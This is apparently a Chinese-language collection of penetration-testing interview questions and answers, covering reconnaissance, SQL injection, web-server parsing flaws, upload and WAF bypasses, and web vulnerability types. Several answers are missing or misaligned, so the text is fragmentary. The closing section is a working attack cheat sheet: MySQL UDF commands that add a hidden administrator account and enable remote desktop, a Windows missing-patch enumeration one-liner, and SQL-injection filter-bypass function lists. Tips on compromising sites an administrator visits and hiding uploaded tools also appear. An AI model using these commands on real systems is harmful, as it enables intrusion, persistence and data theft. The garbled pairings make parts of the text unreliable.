1.拿到一个待检测的站,你觉得应该先做什么?
收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...2.mysql的网站注入,5.0以上和5.0以下有什么区别?
5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。
社工找出社交账号,里面或许会找出管理员设置密码的习惯。
利用已有信息生成专用字典。
观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西。4.判断出网站的CMS对渗透有什么意义?
查找网上已曝光的程序漏洞。
如果开源,还能下载相对应的源码进行代码审计。5.一个成熟并且相对安全的CMS,渗透时扫目录的意义?
敏感文件、二级目录扫描
站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点6.常见的网站服务器容器。
root权限以及网站的绝对路径。8.目前已知哪些版本的容器有解析漏洞,具体举例。
IIS6.0/xx.asp/xx.jpg"xx.asp"是文件夹名
IIS7.0/7.5默认Fast-CGI开启,直接在url中图片地址后面输入/1.php,会把正常图片当成php解析
Nginx版本小于等于0.8.37,利用方法和IIS7.0/7.5一样,Fast-CGI关闭情况下也可利用。空字节代码xxx.jpg.php
Apache上传的文件命名为:test.php.x1.x2.x3,Apache是从右往左判断后缀
linux大小写敏感,windows大小写不敏感。10.为何一个mysql数据库的站,只有一个80端口开放?
更改了端口,没有扫描出来。
站库分离。
3306端口不对外开放11.3389无法连接的几种情况。
没开放3389端口
端口被修改
防护拦截
处于内网(需进行端口转发)12.如何突破注入时字符被转义?
宽字符注入
hex编码绕过13.在某后台新闻编辑界面看到编辑器,应该先做什么?
查看编辑器的名称版本,然后搜索公开的漏洞。14.拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?
具体其他的事情,不好详说,建议大家自己去搜索语句来玩玩。15.注入漏洞只能查账号密码?
只要权限广,拖库脱到老。16.安全狗会追踪变量,从而发现出是一句话木马吗?
是根据特征码,所以很好绕过了,只要思路宽,绕狗绕到欢,但这应该不会是一成不变的。17.access扫出后缀为asp的数据库文件,访问乱码。如何实现到本地利用。
迅雷下载,直接改后缀为.mdb。18.提权时选择可读写目录,为何尽量不用带空格的目录?
因为exp执行多半需要空格界定参数19.某服务器有站点A,B为何在A的后台添加test用户,访问B的后台。发现也添加上了test用户?
同数据库。20.注入时可以不使用and或or或xor,直接orderby开始注入吗?
and/or/xor,前面的1=1、1=2步骤只是为了判断是否为注入点,如果已经确定是注入点那就可以省那步骤去。21:某个防注入系统,在注入时会提示:
浏览器中改编码。23.审查上传点的元素有什么意义?
有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
先爆破用户名,再利用被爆破出来的用户名爆破密码。
其实有些站点,在登陆处也会这样提示
这就是传说中的下载漏洞!在file=后面尝试输入index.php下载他的首页文件,然后在首页文件里继续查找其他网站的配置文件,可以找出网站的数据库密码和数据库的地址。26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录。请问你的想法是?
直接在网站二级目录/abc/下扫描敏感文件及目录。27.在有shell的情况下,如何使用xss实现对目标站的长久控制?
审查元素把密码处的password属性改成text就明文显示了29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?
原因很多,有可能web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过30.审查元素得知网站所使用的防护软件,你觉得怎样做到的?
在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12看HTML体部比如护卫神就可以在名称那看到
隐藏文件夹,为了不让管理员发现你传上去的工具。32、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由:
A.demo.jspid=2+1B.demo.jspid=2-1选B,在URL编码中+代表空格,可能会造成混淆33、以下链接存在sql注入漏洞,对于这个变形注入,你有什么思路?
demo.doDATA=AjAxNg==DATA有可能经过了base64编码再传入服务器,所以我们也要对参数进行base64编码才能正确完成测试34、发现demo.jspuid=110注入点,你有哪几种思路获取webshell,哪种是优选?
XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTPOnly来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。
CSRF是跨站请求伪造攻击,由客户端发起SSRF是服务器端请求伪造,由服务器发起重放攻击是将截获的数据包进行重放,达到身份认证等目的37、说出至少三种业务逻辑漏洞,以及修复方式?
密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码身份认证漏洞中最常见的是会话固定攻击和Cookie仿冒,只要得到Session或Cookie即可伪造用户身份验证码漏洞中存在验证码允许暴力破解、验证码可以通过Javascript或者改包的方法来进行绕过38、圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
40、你常用的渗透工具有哪些,最常用的是哪个?
41、描述一个你深入研究过的CVE或POC。
**【【【【【【【MYSQL提权】】】------------------------------一UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:createfunctioncmdshellreturnsstringsoname’udf.dll’selectcmdshell(’netuseriis_user123!@#abcABC/add’);selectcmdshell(’netlocalgroupadministratorsiis_user/add’);selectcmdshell(’regedit/sd:web3389.reg’);dropfunctioncmdshell;selectcmdshell(’netstat-an’);
windows2003>>systeminfo>C:\Windows\Temp\temp.txt&(for%iin(KB3057191KB2840221KB3000061KB2850851KB2711167KB2360937KB2478960KB2507938KB2566454KB2646524KB2645640KB2641653KB944653KB952004KB971657KB2620712KB2393802KB942831KB2503665KB2592799KB956572KB977165KB2621440)do@typeC:\Windows\Temp\temp.txt|@find/i"%i"||@echo%iNotInstalled!)&del/f/q/aC:\Windows\Temp\temp.txt
可运用的sql函数&关键字:MySQL:uniondistinctuniondistinctrowprocedureanalyse()updatexml()extracavalue()exp()ceil()atan()sqrt()floor()ceiling()tan()rand()sign()greatest()字符串截取函数Mid(version(),1,1)Substr(version(),1,1)Substring(version(),1,1)Lpad(version(),1,1)Rpad(version(),1,1)Left(version(),1)reverse(right(reverse(version()),1)字符串连接函数concat(version(),'|',user());concat_ws('|',1,2,3)字符转换Char(49)Hex('a')Unhex(61)过滤了逗号(1)limit处的逗号:limit1offset0(2)字符串截取处的逗号mid处的逗号:mid(version()from1for1)MSSQL:IS_SRVROLEMEMBER()IS_MEMBER()HAS_DBACCESS()convert()col_name()object_id()is_srvrolemember()is_member()字符串截取函数Substring(@@version,1,1)Left(@@version,1)Right(@@version,1)(2)字符串转换函数Ascii('a')这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypassChar('97')